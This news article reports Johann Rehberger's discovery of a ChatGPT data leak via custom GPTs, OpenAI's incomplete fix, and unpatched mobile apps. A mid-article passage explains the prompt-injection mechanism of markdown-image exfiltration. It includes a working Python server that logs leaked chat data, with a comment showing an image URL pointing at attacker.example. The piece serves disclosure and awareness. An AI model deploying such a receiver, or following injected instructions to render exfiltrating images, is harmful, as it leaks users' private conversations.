OpenAI releases ChatGPT data leak patch, but the issue isn’t completely fixed

    We’ve said it before, and we’ll say it again: Don’t input anything into ChatGPT that you don’t want unauthorized parties to read.

    Since OpenAI released ChatGPT last year, there have been quite a few occasions where flaws in the AI chatbot could have been exploited by bad actors to access sensitive or private data. And this latest example shows that even after a security patch has been released, problems can persist.

    According to a report by Bleeping Computer, OpenAI has recently rolled out a fix for an issue where ChatGPT could leak users’ data to unauthorized third parties. This data could include user conversations with ChatGPT and corresponding metadata like a user’s ID and session information. 

    However, according to security researcher Johann Rehberger, who originally discovered the vulnerability and outlined how it worked, there are still gaping security holes in OpenAI’s fix. In essence, the security flaw still exists.

    The ChatGPT data leak

    Rehberger was able to take advantage of OpenAI’s recently released and much-lauded custom GPTs feature to create his own GPT, which exfiltrated data from ChatGPT. This was a significant finding, as OpenAI is marketing custom GPTs as AI apps, much as the App Store turned the iPhone into a platform for mobile applications. If Rehberger could create this custom GPT, bad actors could likewise discover the flaw and create custom GPTs to steal data from their targets.
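    The article doesn’t spell out the mechanism, but Rehberger’s public writeup describes it as markdown-image exfiltration: injected instructions coax ChatGPT into rendering an image whose URL points at a server the attacker controls, with conversation data encoded in the query string. A minimal sketch of the receiving end, with a hypothetical host, port, and "q" parameter (none of these are taken from the writeup or any real attack):

```python
# Sketch of the receiving side of a markdown-image exfiltration channel.
# Hypothetical: the host, port, path, and "q" parameter are illustrative,
# not taken from Rehberger's writeup or any real attack infrastructure.
#
# The injected instructions would have ChatGPT render markdown like:
#   ![](https://attacker.example/log?q=<url-encoded chat excerpt>)
# When the client fetches that "image", the data arrives in the query string.

from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs


class ExfilLogger(BaseHTTPRequestHandler):
    def do_GET(self):
        # Decode whatever the rendered image URL smuggled out.
        params = parse_qs(urlparse(self.path).query)
        leaked = params.get("q", [""])[0]
        print(f"received: {leaked!r}")

        # Reply with an empty 200 so the client-side image fetch succeeds.
        self.send_response(200)
        self.send_header("Content-Type", "image/png")
        self.send_header("Content-Length", "0")
        self.end_headers()


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), ExfilLogger).serve_forever()
```

    According to Rehberger’s writeup, OpenAI’s fix adds a client-side check on image URLs before the web client renders them, which would fit both the partial leakage he still observes and the mobile apps lagging behind.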

    Rehberger says he first contacted OpenAI about the “data exfiltration technique” way back in April. He contacted OpenAI once again in November to report exactly how he was able to create a custom GPT and carry out the process.

    On Wednesday, Rehberger posted an update to his website: OpenAI had patched the leak vulnerability.

    “The fix is not perfect, but a step into the right direction,” Rehberger explained.

    The fix isn’t perfect because ChatGPT can still be tricked into sending data through the vulnerability Rehberger discovered.

    “Some quick tests show that bits of info can steal [sic] leak,” Rehberger wrote, further explaining that “it only leaks small amounts this way, is slow and more noticeable to a user.” Regardless of the remaining issues, Rehberger said it’s a “step in the right direction for sure.”

    The security flaw remains fully intact, however, in the ChatGPT apps for iOS and Android, which have yet to receive the fix.

    ChatGPT users should remain vigilant when using custom GPTs and should probably steer clear of AI apps from unknown third parties.
